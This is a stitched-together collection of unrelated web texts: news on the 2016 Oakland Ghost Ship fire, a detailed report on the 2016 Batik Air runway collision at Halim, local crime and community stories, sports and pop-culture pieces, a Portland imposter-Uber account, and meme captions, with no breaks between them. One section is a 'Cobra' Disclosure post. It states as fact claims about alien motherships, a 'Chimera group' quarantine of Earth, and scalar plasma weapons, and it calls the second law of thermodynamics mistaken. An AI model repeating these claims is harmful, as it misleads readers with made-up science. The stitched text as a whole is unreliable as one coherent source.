Gomez-Hall is from San Diego, and is “a talented artist who'd just started doing book design,” according to Counterpoint: “Everyone on staff here in Berkeley, and in Portland and New York, is simply heartbroken,” said one person familiar with the situation.
As of Sunday afternoon, 33 fatalities had been confirmed, according to the Alameda County sheriff's office. The Alameda County coroner's office is in the process of identifying the victims.
The Alameda County district attorney's office has activated its criminal investigation teams “and is
actively looking at this with all of the other law enforcement partners,” the city reports.
The Daily Cal first reported the “missing” status of Madden, Cline, Plotkin and Morris earlier this weekend.
The deadly fire took place at an artist collective's warehouse called the “Ghost Ship” during the Golden Donna 100% Silk 2016 West Coast Tour, according to the Facebook page for the event, which has since been turned into a memorial page. The warehouse has been identified as the home of the Satya Yuga collective.
According to numerous reports, the building had no fire alarms or sprinklers, and only a staircase made of pallets connected the first floor to the second. Berkeley resident Diego Aguilar-Canabal told The New York Times he had been to the warehouse once last summer “and remembered it as a dim and cluttered area with a ‘maze' of furniture, canvas paintings on the walls and papier-mâché hanging from the ceilings.”
A candlelight vigil is planned for Monday at Lake Merritt's pergola, 559 El Embarcadero, at 8 p.m. and the Oakland A's have set up a donation page to help victims of the fire. The Oakland Raiders have also signed on to support the fundraising effort, and the organizations each plan to match up to $30,000 in relief donations, up to $60,000.
As of Sunday afternoon, seven victims had been identified and their families had been notified by authorities. Their names have not been released. At least nine bodies were recovered and removed Saturday.
The three-alarm fire broke out Friday, Dec. 2, just after 11:30 p.m. at 1315 31st Ave. in Oakland.
“The badly damaged building has required shoring, and first responders have begun retrieving the deceased. The roof of the building collapsed onto the second floor which has complicated the process of recovery effort,” according to a statement released Sunday morning by the city of Oakland. “This process will be undertaken in a methodical and thorough process in a humane and compassionate manner to ensure that the victims are recovered and identified, and to make sure their families have this information as expeditiously as possible.”
As of Sunday afternoon, the Oakland Fire Department, Oakland Police Department, Alameda County Sheriff's Office and Oakland Public Works Department were recovering bodies from the warehouse.
“To ensure the safety of the first responders, more shoring has been placed to secure the collapsed sections of the building. This will allow first responders to safely proceed with the recovery process,” the city said in a statement released at 2:30 p.m. Sunday.
Multiple agencies have been working together on the recovery, as well as on the investigation into what caused the fire.
“Personnel have created pathways through the debris, dividing the building into quadrants and removing debris by hand, bucket-by-bucket. This methodical and painstaking approach is important to respectfully remove the victims and carefully process the scene,” according to the city. As of Sunday afternoon, about 30% of the building had been searched.
When the roof collapsed, authorities had to breach a cinderblock wall Saturday at about 10 p.m. using heavy rescue equipment to remove debris.
The city has brought in counseling services for first-responders and their support teams due to the “devastation of the scene.”
The coroner's bureau and American Red Cross have set up a Family Assistance Center for family and friends who are looking for loved ones. The center is located at 2425 E. 12th St. Grief counseling and resources are available.
The city says it will undertake a “thorough investigation of what occurred.”
“We are committed to bringing every resource to bear to determine what happened here and how such a tragic event could have occurred. Our priority is to bring closure to this tragedy for the victims' families,” according to Sunday morning's statement.
According to the city, the building's last permitted use was as a warehouse. On Nov. 13, the city received complaints about blight and unpermitted interior construction there. On Nov. 17, a city inspector verified the blight complaint but was unable to get inside the building to confirm the report of interior construction. That investigation is ongoing.
The following individuals are listed after the message “REST IN PEACE ANGELS” on the memorial page for the Ghost Ship party: Alana Kane, Alex Ghassan, Amanda Kershaw, Ara Christina Jo, Barrett Clark, Ben Runnels, Cash Askew, Chase aka Nex Iguolo, Chelsea Faith Dolan, David Cline, Denalda Nicole Renae aka Nicole Siegrist, Em B, Feral Pines aka J. Fritz, Griffin Madden, Hanna Ruax, Jason MCarty, Jennifer Kiyomi Tanouye, Joey Casio, Johan Handel, Johnny Igaz, Jonathan Bernbaum, Micah Danemayer, Michelle Sylvan, Nicholas Walrath, Peter Wadsworth, Travis Hough, William Dixon and Wolfgang Renner.
A list with links to photographs of many on the list was published Saturday on Heavy.com.
Related:
Remembering David Cline: ‘A ferociously brilliant student and impossibly bright mind' (12.05.16)
Beloved ‘VJ' and BHS alum killed in Oakland fire; LA vigil planned for Jonathan Bernbaum (12.05.16)
Have a question about a local public safety incident? Write to crime@berkeleyside.com. Photographs and videos are always appreciated.
Follow us on Twitter and Facebook or get the latest news in your inbox. Email us at tips@berkeleyside.com. Support independent local journalism by becoming a member.
By Simon Hradecky, created Monday, Apr 4th 2016 14:54Z, last updated Monday, Apr 10th 2017 13:56Z A Batik Air Boeing 737-800, registration PK-LBS performing flight ID-7703 from Jakarta Halim Perdanakusuma to Ujung Padang (Indonesia) with 49 passengers and 7 crew, was in the takeoff roll on runway 24 at 19:55L (12:55Z) when its left wing tip entangled with the vertical tail and left wing of a Transnusa Avions de Transport Regional ATR-42-600 registration PK-TNJ crossing the runway under tow and separated the most of the vertical tail plane as well as the left wing from the ATR, the left wing tank ruptured open. Both aircraft caught fire, the Boeing was evacuated via slides. Fire engines responded and were able to put the fires out in a matter of minutes. There were no injuries, both aircraft received substantial damage.
Indonesia's Ministry of Transport reported the Boeing was taxiing for departure, the ATR was under tow to a hangar when the aircraft collided causing damage to the left wing tip of the Boeing and separation of vertical tail and left wing of the ATR. There were no injuries. The airport needed to be closed however.
Ground observers reported the Boeing 737-800 was already accelerating for takeoff from runway 24, when the ATR under tow crossed the runway about 1280 meters/4200 feet down the runway. The Boeing rejected takeoff but could not stop in time to avoid the collision.
Radar data suggest the Boeing was accelerating for takeoff from runway 24 reaching about 110 knots over ground when takeoff was rejected. The aircraft came to a stop about 500 meters/1650 feet past the intersection of the runway with the only crossing taxiway.
Batik Air reported their flight was cleared for takeoff and was accelerating when the aircraft under tow crossed the runway. Their crew rejected takeoff however could not avoid the collision.
Indonesia's NTSC have opened an investigation into the accident.
On Apr 5th 2016 Lembaga Penyelenggara Pelayanan Navigasi Penerbangan Indonesia (LPPNPI), ATC provider, reported that the tower controller on duty, his assistant as well as the supervisor were relieved from duties for at least three weeks because of emotional disorders and psychological effects of the accident on them. Indonesia's NTSC in the meantime is collecting data and is going to investigate the accident.
On Apr 6th 2016 Indonesia's Ministry of Transport suspended all ground handling operations by Jasa Angkasa Semesta (JAS) at Halim Perdanakusuma Airport arguing that the ground handler failed to prevent the collision on the runway. The suspension, not affecting JAS operations on other Indonesian airports, remains in effect until JAS complies with NTSC recommendations.
On Apr 11th 2016 Indonesia's NTSC released two safety recommendations to Indonesia's Ministry of Transport as result of the investigation so far: all aircraft operating within the runway area, irrespective of being powered, towed or otherwise, should be on the same frequency and all aircraft operating within the runway area, irrespective of being powered, towed or otherwise, should activate their position lights.
On Apr 14th 2016 the French BEA reported based on preliminary information from NTSC Indonesia, that the Batik Boeing 737-800 had been cleared to enter runway 24 via taxiway C and backtrack the runway. In the meantime the tug driver of the Transnusa ATR requested clearance to cross the runway from the north to the south apron and received clearance to taxi via taxiway C, runway 06/24 and taxiway G. While crossing the runway the tug driver saw the Boeing 737 accelerate for takeoff and attempted to steer the tug and aircraft to the right runway shoulder, however the left wing of the Boeing collided with the vertical stabilizer and left wing of the ATR. The Boeing rejected takeoff and came to a stop 400 meters past the point of collision. The occurrence was rated an accident and is being investigated by Indonesia's NTSC.
On May 11th 2016 Indonesia's NTSC released their preliminary report reporting, that the AT42 was being towed with two engineers on the flight deck (to apply brakes if needed during the tow) and the tow driver driving the tug, the systems on board of the AT42 were not (electrically) powered up, therefore neither navigation nor strobe lights nor radios for communication were up. Communication between tug driver and ATC was performed via a handheld radio on frequency 152.700MHz (not a frequency available on flight decks).
The airport's tower was staffed by controller, assistant, supervisor and flight data officer. The NTSC annotated that the view to the runway 24 was difficult due to light reflections from the illuminated tower cab.
The controllers reported not seeing any light except on the tug for the AT42.
The B738, communicating on tower frequency 118.600MHz, was cleared to backtrack runway 24.
The tug driver, towing the AT42 from the north apron to the south apron, was told to report on taxiway C, shortly after reported on taxiway C and was instructed to expedite the taxi by the assistant. The tug driver stated the taxiroute was via taxiway G which was affirmed by the assistant (editorial note: the report suggests that this exchange was taken as clearance to enter the runway by the tug driver although strictly formally a clearance to enter the runway had not been issued and the assistant obviously did not assume the AT42 would continue onto the runway, realizing this only after the collision when inquiring with the tug driver).
The B738 was still backracking runway 24. Some time later the B738 performed the 180 and reported ready for takeoff. The controller checked the runway for any obstacles, did not see any vehicles or object on the runway and cleared the flight for takeoff.
The NTSC then described the events:
The pilot stated that during line up, the lights surround the turn pad were very bright and affected his forward vision for a short time. It was common practice in Halim to lineup at the turn pad beyond the threshold runway 24.
After received the takeoff clearance, the Second in Command (SIC) as pilot flying (PF) opened the power and pressed the Take Off / Go Around (TOGA) button.
The towing car driver stated that when he saw the ID 7703 was lining up for takeoff then asked to the Halim Tower whether the ID 7703 was initiating the takeoff, and there was no reply from the Halim Tower. The towing car driver then speeds up the towing and turned to the right side of the runway.
When ID 7703 was on rolling takeoff at approximate 80 knots, the SIC saw an object and confirming to the Pilot in Command (PIC) concerning to the object. The pilots could not identify the object but later on when the object became closer, the SIC realized that there was an aircraft.
The PIC took over control and applied the right rudder towards the right side of runway centerline and maintained between the runway centerline and the runway edge. The PIC intended to reject the takeoff shortly after the pilot felt an impact. The pilot performed the reject takeoff and the ID 7703 stopped at approximately 400 meters from the towed aircraft which stopped at the left of the runway 24 centerlines at approximately 100 meters from taxiway G.
The assistant saw fire on the left side of ID 7703 when the aircraft rolled between taxiway C and B. Then the assistant pressed the crash bell and informed Rescue and Fire Fighting Service (RFFS) about the fire.
After the aircraft stopped, the PIC commanded to the SIC to perform ON GROUND EMERGENCY procedure, and commanded to the flight attendant ATTENTION CREW ON STATION twice. The PIC noticed fire on the left wing tip and immediately shut down both engines, activated the fire extinguishers of both engines and Auxiliary Power Unit (APU) and commanded to the flight attendant evacuation from the right.
After the aircraft stopped and received the PIC command ATTENTION CREW ON STATION, the flight attendants checked the condition inside and outside the aircraft through the viewing window. There was no damage inside the aircraft and they did not see any fire outside the aircraft.
The flight attendants opened all aircraft passenger doors and the escape slides deployed. Most of the passengers were evacuated from the left forward door (1L).
The pilots realized that the impacted object was a towing aircraft after they disembarked the aircraft.
The air traffic controller set crew realized that the towed aircraft was on the runway and collided with ID 7703 after asked to the towing car driver.
The left wing of the Boeing 737 struck the AT-42 about 850 meters down runway 24, the Boeing came to a stop about 400 meters further down the runway. The data stored by the flight data recorder suggest that the power levers were retarded after the collision and the autobrakes engaged at the same time, the speed increased by 14 knots between collision and engagement of autobrakes. Takeoff was rejected at about 130 KIAS.
On Apr 10th 2017 Indonesia's NTSC (KNKT) released their final report concluding the probable causes of the accident were:
- Handling of two movements in the same area with different controllers on separate frequencies without proper coordination resulted in the lack of awareness to the controllers, pilots and towing car driver.
- The communication misunderstanding of the instruction to follow ID 7703 most likely contributed the towed aircraft enter the runway.
- The lighting environments in the tower cab and turning pad area of runway 24 might have diminished the capability to the controllers and pilots to recognize the towed aircraft that was installed with insufficient lightings.
The NTSC reported the communication with respect to the tow driver:
On parking stand B-1:
The towing car driver requested to Halim Control Tower Unit (Halim Tower) for towing to reposition an aircraft from parking stand B-1 to the south apron and was replied by the Flight Data Officer to standby. After the ID7703 started to taxi, the assistant controller issued towing clearance to the towing car driver and to report when on taxiway C.
At about abeam parking stand B-9:
The assistant controller instructed the towing car driver to expedite the towing and to follow ID 7703. The instruction was acknowledged by the towing aircraft driver.
At about entering taxiway C:
The assistant controller reinstructed the towing car driver to expedite the towing and to follow ID 7703. The instruction was acknowledged by the towing aircraft driver.
Note: The air traffic control crew on duty stated that this communication did not occur.
On taxiway C:
The assistant controller reinstructed the towing car driver to expedite the towing and to follow ID 7703. The towing car driver confirmed that the taxi route was via taxiway G and affirmed by the assistant controller.
Note: The air traffic control crew on duty stated that this communication did not occur.
On the runway:
The towing car driver asked twice to the Halim Tower unit whether the ID 7703 was initiating the takeoff and there was no reply.
Note: The air traffic control crew on duty stated that this communication did not occur.
After the collision:
The assistant controller requested the towed aircraft position. The towing car driver informed that the towed aircraft was on the runway and had just collided with ID 7703.
The NTSC analysed with respect to the tow driver:
The instruction to follow the ID 7703 was given when the assistant controller did not maintain the continuous watch to the towed aircraft position and expected that the towing car driver would report when position on taxiway C. Meanwhile the towing car driver might interpret that the towed aircraft approved to enter the runway and considered the position report on taxiway C was no longer required. This communication misunderstanding most likely contributed the towed aircraft enter the runway.
The NTSC analysed with respect to the tower controller:
The lighting environment in the tower cab created glare on the window glass which increased the difficulty for the controllers to observe the towed aircraft that was not clearly visible, especially from the rear.
With respect to the collision avoidance maneouvers attempted the NTSC analysed:
During the takeoff roll, after the ID 7703 pilots noticed an object on the runway. At a speed of approximately 115 knots, the rudder and steering was deflected and the aircraft heading changed approximately 2 degrees to the right for about 2 seconds. This was the pilots action to deviate and maintain the aircraft position between the runway centerline and the runway edge. The pilot tried to avoid collision with the object and to stay on the runway. This action made the aircraft deviate approximately 6 meters to the right from the runway centerline.
The towing car driver saw that the ID 7703 was on the takeoff roll, then accelerated the towing and turned to the right side of the runway. The investigation found that the towing car was on the grass after the impact and the aircraft was on a heading of approximately 080 degrees.
Both aircraft had moved away from the runway centerline, however the ID 7703 left wing collided with the left wing and the vertical stabilizer of the towed aircraft.
The decision of both the pilot and the towing car driver to move away from the runway centerline avoided a centerline (head to head) collision however the wing collision was unavoidable. The wing collision was less severe compared to an aircraft collision on the runway centerline.
Metars (no later METARs available):
WIHH 041200Z 04006KT 5000 HZ FEW017CB SCT018 30/25 Q1010 RMK CB TO SW
WIHH 041100Z 04008KT 6000 SCT018 31/24 Q1008 NOSIG
WIHH 041000Z 06012KT 7000 FEW018 32/23 Q1007 NOSIG
WIHH 040900Z 06012KT 7000 FEW018 33/24 Q1007 NOSIG
WIHH 040800Z 06010KT 7000 SCT018 33/24 Q1007 NOSIG
The aftermath and emergency response (Video: Ippi Thyssen):
https://www.youtube.com/watch?v=vQZ98Dhf_No
View from cockpit while aligning with runway 24 of a flight departing Halim runway 24 just before the collision (Photo: NTSC):
Wreckage distribution (Graphics: NTSC):
The collision and fire damage of PK-TNJ (Photo: TunasKelapa):
The collision and fire damage of PK-LBS (Photo: TunasKelapa):
Map (Graphics: AVH/Google Earth):
A Thiells man stopped for a traffic violation in downtown Nyack has been hit with drug possession charges, according to Orangetown Police.
Adam S. Rose, 38, of 6 Crescent Drive, Thiells was stopped by a town officer at 10:43 p.m. Saturday for going through a red light at Main Street and Franklin Street in his 2001 Toyota Corolla. As a town officer approached the car, police said, he detected a strong odor of marijuna coming from inside the car.
Police said three plastic bags of marijuana were found in the center console of the car and four Hydrocondone and two Oxycodone pills were also found in the car.
Rose was charged with seventh-degree criminal possession of a controlled substance, unlawful possession of marijuana and he was cited for a traffic violation. Police said Rose was released pending an April 16 hearing in Nyack Village Court.
Some black Muslims in Ottawa are upset there are no people from their community speaking at a Muslim conference in the capital on Saturday.
I.Lead is an annual conference put together with the help of various mosques in Ottawa. This year, there are seven speakers — five men and two women — who will address the conference's theme "With hardship comes ease."
However, none of them are black.
Jalil Marhnouj, who helped organize the conference, said several black Muslims were approached to speak but were unavailable.
"Every year, we invite speakers from different backgrounds … and they have attended and sometimes they can't. And this year, some of them couldn't," he said.
Lots of experts to choose from
Chelby Daigle, editor of Muslim Link and the author of a recent report on anti-black racism in Ottawa, said part of the issue is the premise that there are only so many qualified black people available.
"People don't realize that that is a form of discrimination," she said. "It's not intentional, but it shows a lack of understanding of the complexity of the Muslim experience in the city."
Daigle believes there are all types of experts that could have been invited to speak from Ottawa's large Black Muslim community and from across the country.
Ottawa's poet laureate is a black Muslim. The poet laureate right now for Edmonton is a black Muslim. We have Ginella Massa, who's an anchor and who's also a black Muslim. We have CBC journalist Eman Bare who we profiled on Muslim Link, who's an award-winning journalist who also writes for Teen Vogue and helps to run Muslim Girl ," said Daigle.
Amran Ali, a Somali-Canadian Muslim woman living in Ottawa, said she was also disappointed at the lack of diversity among speakers.
Although Ottawa has a large black Muslim population there are no black speakers at this year's I.Lead conference. (Facebook)
"I wasn't expecting to see such a limited list," she said.
"Ottawa's Muslim community is diverse. It's made up of different ethnic backgrounds and different socioeconomic backgrounds," said Ali.
"Any event that purports to be an event for the large Muslim community — and in particular Muslim youth — must be a reflection."
Marhnouj said conference organizers are open to hearing suggestions and the conference will be a chance for people to voice their concerns.
"We will listen to them and we will take that into consideration, whatever they come up with, we will act accordingly," he said.
"We work so hard to bring unity to our community and to bring knowledge," he said. "And in the end it's always a human effort and with human efforts there will always be shortcomings."
The intersection of identities
Chelby Daigle thinks having greater diversity at conferences like I.Lead is important because intersecting identities shape people's experiences differently and that needs to be reflected.
"I'm still more likely to face a hate crime because I'm black," said Daigle.
According to Statistics Canada, in 2015 hate crimes targeting blacks declined but they still made up the largest percentage of the total number reported. Meanwhile, the number of police-reported hate crimes against Muslims jumped by 60 per cent.
"If you're experiencing both anti-black racism and Islamophobia as a young person, that's probably having a serious impact on your mental health, your concept of identity [and] where you feel welcomed," said Daigle.
I.Lead isn't the first Muslim-centred conference in Canada that's received criticism from black Muslims.
In particular, when asked if Muslim communities should be more supportive of movements like Black Lives Matter, Yusuf said "There are twice as many whites being shot by police but nobody ever shows those videos. It's the assumption the police are racist and it's not always the case." ​At the Reviving the Islamic Spirit conference in Toronto in December 2016, American Islamic scholar and president of Zaytuna College, Hamza Yusuf, made comments many participants found dismissed the struggles and work of anti-black racism advocates.In particular, when asked if Muslim communities should be more supportive of movements like Black Lives Matter, Yusuf said "There are twice as many whites being shot by police but nobody ever shows those videos. It's the assumption the police are racist and it's not always the case."
Amran Ali says she was disappointed at the lack of diversity at this year's I.Lead conference. (CBC)
Yusuf later apologized for his comments.
Promoting greater diversity and inclusion
Amran Ali believes the key ensuring greater diversity is reaching out to a broad range of people.
"Because it's about Islam it means it has to be a big umbrella event where all Muslims — those who look like me, those who look like the organizers, those who look like Caucasian folk, Indigenous folks — should see themselves reflected," she said.
"If we're not reflected on the stage where people are talking or lecturing or teaching or inspiring and motivating, then frankly it feels isolating. It makes you feel you don't belong, It makes you feel that you are less than."
Daigle agrees and said diversity, from a business standpoint, makes sense because it attracts a greater number of people. "We often look at [diversity] as a chore. Or we look at it as if we're doing a favour to a community that's complaining. And we need to stop looking at it that way and say, 'no, this will make our event better.'"
Daigle points to Carleton University Muslim Students' Association as an example of a group that has committed to being diverse and inclusive.
"We're seeing more and more Muslim associations in the country creating equity advisory committees to make sure that it's actually an inclusive space. And it shows it's not hard to do but, again, it's something you have to choose to do."
Karl Malone said he's proud of Jason Collins for coming out as the first openly gay active player in one of the four major U.S. pro sports leagues.
"Let's just cut through the skinny ... I'm proud of the young man," Malone said Thursday on the "Bucher & Towney" show with Ric Bucher and Chris Townsend on 95.7 FM in the Bay Area. "Isn't it about time that we stopped wasting so much time on what a person prefers?"
Malone also spoke about his gay brother-in-law, as well as former teammate John Amaechi, who first spoke publicly about being gay in 2007 after retiring from the NBA.
"I played with a teammate, John Amaechi, who was gay. He didn't just wake up and say, 'I'm gay today.' He was gay then," Malone said. "Did I ever once feel uncomfortable? Do I feel uncomfortable right now with a gay person in the room? No. I might even joke with them about it ... I would undress in front of them now. I'm not afraid."
Collins announced Monday that he's gay in a story for Sports Illustrated.
"I didn't set out to be the first openly gay athlete playing in a major American team sport. But since I am, I'm happy to start the conversation," Collins wrote. "I wish I wasn't the kid in the classroom raising his hand and saying, 'I'm different.' If I had my way, someone else would have already done this. Nobody has, which is why I'm raising my hand."
The 34-year-old Collins, who is a free agent, finished last season with the Washington Wizards after being traded by the Boston Celtics.
Information from The Associated Press was used in this report.
I woke up this morning feeling like I absolutely needed to hear the song “Night Begins to Shine” (aka, the song Cyborg from Teen Titans Go! is obsessed with). I don't know why, exactly. It just popped into my head, and I couldn't get it out.
This is not the first time this has happened. It seems like the song is playing on a loop in my head, and I merely manage to occasionally hit the pause button and push it away for a couple of days. It's been this way for a month now, pretty much ever since the Teen Titans Go! episode “40%, 40%, 20%” premiered on October 21st. In the episode, Cyborg's obsession with his favorite song, an obscure 80s hit with lyrics like “When I look at you I see the story in your eyes, when we're dancing the night begins to shine,” annoys his fellow Titans (Robin, Starfire, Beast Boy and Raven).
However, they soon learn that his “real strength comes not from his robot parts, but from” the inspiration he gets from that damn song. When listening to it, his imagination runs wild and he views the world very differently, picturing himself riding a winged horse and wearing a wolf-skin coat while saving his fellow Titans from one of their enemies. Of course, we get to see exactly what he sees, and across the episode's 11-minute running time “Night Begins to Shine” plays practically non-stop.
The first time I saw the episode, which is actually the second appearance of “Night Begins to Shine” on the show since it was used far more sparingly in “Slumber Party,” I looked forward to finding out which 80s group wrote the song. I couldn't wait to track them down on Spotify and take a deep dive into their catalog.
Yeah, funny thing about that: “Night Begins to Shine” seems to have been written specifically for Teen Titans Go! It's not some obscure, old song. In fact, it's only given to us in pieces in “40%, 40%, 20%.” Before iTunes put it up on Oct. 30th, you couldn't really buy it anywhere. It's now credited to the band B.E.R., and it's their only song on iTunes. There are now countless fan-made music videos using the footage from “40%, 40%, 20%, and I was actually listening to one of those in the background while writing the intro of my Hunger Games article this morning. Why not pay it forward?
Here's “Night Begins to Shine” and the Heavy Metal-esque imagery Cyborg imagines, with my favorite part being when an attacking wolf is simply absorbed into his costume and becomes a kick-ass coat (it's so beautifully bonkers):
Advertisements
By Cobra
There are great changes happening in our Solar System. A vast fleet comprised of many motherships of countless positive cosmic races has reached its final parking position on key resonance points within our Solar System to support the process of full Disclosure.
Some of those ships can be seen clearly on photos which were taken by our team this week with StratoProbe 5 about 17 km (57,000 feet) above the surface:
For the first time in 26,000 years, the Chimera group is lately starting to show signs of worry about the stability of the quarantine status for planet Earth.
This is why they are fortifying their defenses within the Air Force Space Command:
http://www.ascensionwithearth.com/2017/04/secret-space-program-update-united.html#more
http://www.saffm.hq.af.mil/News/Article-Display/Article/1140695/af-announces-major-changes-to-space-enterprise/
Disclosure process is an exponential curve, going slowly at first during the soft Disclosure phase we are experiencing now, but steadily accelerating until we reach the breakthrough at the moment of the Event into full Disclosure.
Many seemingly unrelated initiatives of the surface population are part of the same greater plan of the Light forces (Operation PrisonBreak) to penetrate the quarantine.
Many space program initiatives in the nearspace, in Earth orbit, on Moon and Mars are expected to experience their breakthrough in the next few years:
http://www.cloudsao.com/ANALEMMA-TOWER
http://www.space.com/36654-virgin-galactic-fly-space-tourists-2018.html
https://sputniknews.com/science/201704261053015674-space-tourism-russia-us-moon-iss/
http://www.ibtimes.com.au/nasa-chief-human-spaceflight-bares-plan-lunar-station-1549696
http://www.zdnet.com/article/china-and-europe-plot-to-build-base-on-the-moon/#ftag=RSSbaffb68
http://www.space.com/36829-this-company-plans-to-mine-the-moon.html
http://www.space.com/36858-made-in-space-archinaut-satellite.html
Mainstream media are slowly preparing for the announcement of the existence of extraterrestrial life. Although certain negative factions will try to spin this into partial Disclosure, they will not be successful and all mainstream media soft Disclosure announcements are really stepping stones towards full Disclosure and are part of the same Operation PrisonBreak:
http://www.ancient-code.com/nasa-mankind-discover-extraterrestrial-life/
http://www.ascensionwithearth.com/2017/04/on-verge-of-most-profound-discovery.html#more
https://news.uchicago.edu/article/2017/04/26/recently-discovered-solar-system-could-seed-life-between-adjacent-exoplanets
http://nypost.com/2017/04/25/aliens-may-have-existed-in-our-solar-system-long-before-us/
https://www.universetoday.com/135347/look-ancient-civilizations-solar-system/
Scientists are finally discovering the plasma web that spans across the Universe:
http://earth-chronicles.com/space/waves-are-found-that-go-through-the-cobweb-of-the-universe.html
Which is perfectly described here:
http://unifiedfractalfield.com/cosmogenetics/
Dipole Repeller, one of the biggest toroidal structures in the Universe is a sector in this Universe with the Local group of galaxies in its center and two lobes of opposite polarity laterally spaced in both directions. This is the cosmic purification station for the Primary Anomaly with planet Earth in its central null zone. Dipole Repeller is the cosmic dynamo that energizes the process of Compression Breakthrough:
https://www.nature.com/articles/s41550-016-0036
Regarding the basic structure of the Universe, scientists are finally beginning to realize that dark energy does not exist:
http://www.sciencealert.com/bubbles-of-expanding-space-could-be-the-end-of-dark-energy
At the same time, alternative community is finally beginning to realize that Schumann resonances are NOT increasing:
http://www.stillnessinthestorm.com/2017/04/must-read-schumann-resonance-advanced-science-psychophysical-regulation-and-psi.html#more
http://www.diamondlightworld.net/blog/heartmath-institute-the-schumann-resonances-are-not-increasing
http://sedonanomalies.weebly.com/schumann-resonance.html
Schuman resonances are named after professor Schumann who was involved in early German secret space program and was later paperclipped into the United States. The frequencies of Schumann resonances are fairly stable and are mainly defined by the physical size of the ionospheric cavity.
The amplitude of Schumann resonances does change and is bigger when ionospheric plasma gets excited. Ionospheric plasma excitation happens because of solar activity, thunderstorms, use of scalar plasma weapons and HAARP and lately also when the Light forces are clearing the plasma anomaly.
There are other concepts in science and in alternative community that will begin to dissolve slowly as more Light and understanding comes in, among them being the second law of thermodynamics (closed systems do not exist), time travel into the past (it violates causality, at least on macroscopic level), and flat Earth (sunsets into the ocean on flat Earth would be impossible because of atmospheric absorption, as sunrays of the setting Sun would need to travel through thousands of miles of air).
Victory of the Light!
This article (The Portal: Disclosure Process) was originally published on The Portal and syndicated by The Event Chronicle.
This article was written by a reader and not the staff of Cardiac Hill
There are many possible candidates out there for the Pitt Offensive coordinator positon. We will probably hear a lot of names thrown around before someone is hired. Here are 6 potential candidates that will probably draw a long look following the departure of Matt Canada.
Tim Salem: Tight Ends coach for Pitt. If Pitt choses to promote from within, Salem would probably be the guy. He has served as Offensive Coordinator at Purdue, Eastern Michigan, and UCF.
http://www.pittsburghpanthers.com/sports/m-footbl/mtt/tim_salem_949239.html
Don Treadwell: Offensive coordinator for Kent State. Treadwell served on Michigan State's staff with Coach Narduzzi in the past. He began his career at Youngstown State as Offensive Coordinator under Jim Tressel. He has also served as OC at Ball State and Cincinatti. He left Michigan State in 2011 to take the head coaching position at Miami of Ohio, and moved to Kent State after being left go from Miami in 2013.
http://www.kentstatesports.com/coaches.aspx?path=football&rc=137
Dave Warner: Co-Offensive Coordinator for Michigan State. Warner is in his 4th season as co-offensive coordinator, and has come under fire after the Spartans' lackluster season. He previously served as OC for Connecticut in 1999 and 2000. As a native of Lehighton, PA Warner also serves as recruiting coordinator in Pennsylvania for Michigan State.
http://www.msuspartans.com/sports/m-footbl/mtt/dave_warner_282842.html
Dan Roushar: Offensive line coach for the New Orleans Saints. Roushar spent 2 seasons as offensive coordinator for Michigan State before moving to the NFL. He has served as coordinator at Butler, Ball State, Northern Illinois, and Illinois.
http://www.neworleanssaints.com/team/coaches/Dan-Roushar/cf733117-3abb-4695-8409-1f3254aac84a
Alex Van Pelt: Quarterbacks coach for the Green Bay Packers. Former Pitt QB who has served for several NFL teams as Quarterbacks coach. Van Pelt served 1 season as offensive coordinator for the Buffalo Bills in 2009 under Dick Jauron.
http://www.packers.com/team/coaches/van-pelt-alex/e4eb93fb-654c-475d-8547-7c97864bfb99
Kirk Ciarrocca: Offensive coordinator for Western Michigan. Ciarrocca has served under PJ Fleck at Western Michigan since 2013, where his offense has set many school records. He served as co-offensive coordinator at Rutgers under Greg Schiano and at Deleware for their FCS title run in 2003.
http://www.wmubroncos.com/coaches.aspx?rc=788
Are there any other possible candidates that you would like to see Pitt take a look at? Which possible candidate would be your favorite?
Uber Boom Drivers
FILE - In this Wednesday, March 18, 2015, file photo, the Uber application displays cars available for a pickup at 100 Centre St on a cell phone in New York. In four years Uber has gone from nearly non-existent to more than 26,000 drivers, joining over 13, 000 New York City taxis. (AP Photo/Mary Altaffer, File)
A Portland woman who was picked up by an imposter Uber driver says her case should serve as a warning to other women who use the ride-hailing service.
Courtney Lage was leaving a friend's birthday party just after midnight on Oct. 11 at a bar near Southeast Grand Avenue. She requested a ride through the Uber app and watched on her phone as the app showed the car approach.
As it appeared to get close, Lage said, a man pulled up and said "Uber?"
Lage got in, but she told The Oregonian/OregonLive she started getting nervous when, as he started driving away, the driver asked for her address. Uber drivers typically use the app's GPS navigation function, and it's programmed with the rider's address. The driver said his was broken, she said.
The driver was also missing an Uber placard usually displayed on the car.
"That's when I realized something's wrong here," Lage said.
When her actual Uber driver called her cellphone asking where she was, Lage demanded to be let out of the car. The man pulled over to the side of the Morrison Bridge and let her out before speeding off, she said.
"He didn't touch me, and he didn't threaten me," she said. "But I think the only reason you pretend to be an Uber is to harm someone."
The real Uber driver stayed on the phone with Lage and picked her up on the bridge.
She called police after she got home, but wasn't able to give officers a license plate number or thorough description of the driver.
A passing driver might have been able to guess Lage was waiting for an Uber because she was waiting and watching her cell phone, she said. Police officers who interviewed Lage also asked if someone might have overheard her telling friends she was going to take Uber home, she said.
It's not clear a crime occurred, said Portland Police spokesman Sgt. Pete Simpson, because Lage got in the car voluntarily and wasn't harmed or threatened. Still, he said, it's a reminder to be cautious.
Imposter Uber drivers have been reported elsewhere. In Tallahassee, Florida, police arrested a 35-year-old man who allegedly claimed to be an Uber driver before exposing himself to a college student and assaulting her, and police at Texas Christian University have warned students to be on the lookout for a man claiming to be an Uber driver who made "indecent comments" and while driving a student and tried to hug her as she demanded to be let out of the car.
Uber said the company builds safeguards into its app to protect riders from imposters. Riders are shown a picture of the car that will pick them up, its license plate number, a picture of the driver and the driver's first name.
Uber spokeswoman Kayla Whaling said drivers are trained to address riders by their first name when picking them up to verify they're affiliated with Uber. And, she said, riders don't have to wait outside in view of passing drivers.
"When you request a ride, you're notified when it arrives," Whaling said. "You don't have to wait on a street corner."
Lage told police the imposter vehicle was a blue Toyota RAV4 with older windows. The real driver drove a similarly colored Mazda, Lage said, and he was wearing sunglasses in his profile photo on Uber, obscuring his face.
Lage said she should have paid more attention to those safety features. But in talking to friends about the experience, she said, she found many have similarly hopped into Uber cars without double-checking.
"I'm the very first to admit they do have some security measures I didn't pay attention to," she said. "If more women know this is a possibility, they won't make the same mistakes I did."
-- Elliot Njus
enjus@oregonian.com
503-294-5034
@enjus
After My First Kiss
After My First Kiss
The Earth is flat
The Earth is flat
TO THE 90 S
TO THE 90 S
when you have both earbuds in
when you have both earbuds in
that dogs are the best
when your teacher agrees
that dogs are the best
when your teacher agrees
Only post REAL women you know
